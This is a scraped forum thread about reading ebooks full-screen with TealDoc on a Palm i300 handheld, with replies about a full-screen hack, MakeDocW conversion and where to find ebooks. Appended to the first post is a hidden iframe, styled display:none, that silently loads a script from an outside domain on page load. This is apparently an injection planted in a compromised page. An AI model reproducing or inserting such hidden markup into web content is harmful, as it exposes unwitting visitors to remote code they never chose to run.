e-books

I am interested in using tealdoc to read ebooks with the full screen of my i300. Could someone help me understand the best way to do this.

I recently went and downloaded an ebook from http://www.peanutpress.com/ and I'm not sure that I will be able to read the book with tealdoc. I will be unable to hotsync until tonight, but would like to know what to expect.

I guess what I am asking is am I going to have to use the palm reader to read my ebook from www.peanutpress.com or is there a way to use tealdoc? All I want to do is read my ebook using the entire screen of the I300 with the screen rotated 90 degrees.

Also, where is the best place to get ebooks?

Thanks for all your help, this forum is awesome!!!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't know about the ebooks but you're at the right place. Run a search for Jake's hacks. He's got a tealdoc hack for full screen. Hope this helps. I don't remember what thread its in or I'd find it myself.

I already heve the version of tealdoc that has the fullscreen option.

My question is mainly how to read ebooks using the fullscreen. More specifically how do I read the ebook I just purchased from www.peanutpress.com using the fullscreen? and if this is not possible then where are some good places to get ebooks that will work with the fullscreen?

Thanks!!

I've used TealDoc from it's beginning. I currently have the latest version that includes fullscreen capabilities. Fullscreen is simply an option and is independent of any ebook text that I have downloaded. It's a good feature, but I still personally prefer to read in normal screen mode. MakeDocW is an easy-to-use utility that will convert downloaded text to TealDoc format and auto-install for next hot-sync. Ebooks can range from titles you buy... to any text you find on the web (just copy/paste to Notepad or Wordpad)... to a newsgroup that was formed about 6 months ago that contains several hundred ebooks already in palm format. There are also several excellent web public domain book archives.

Enjoy!
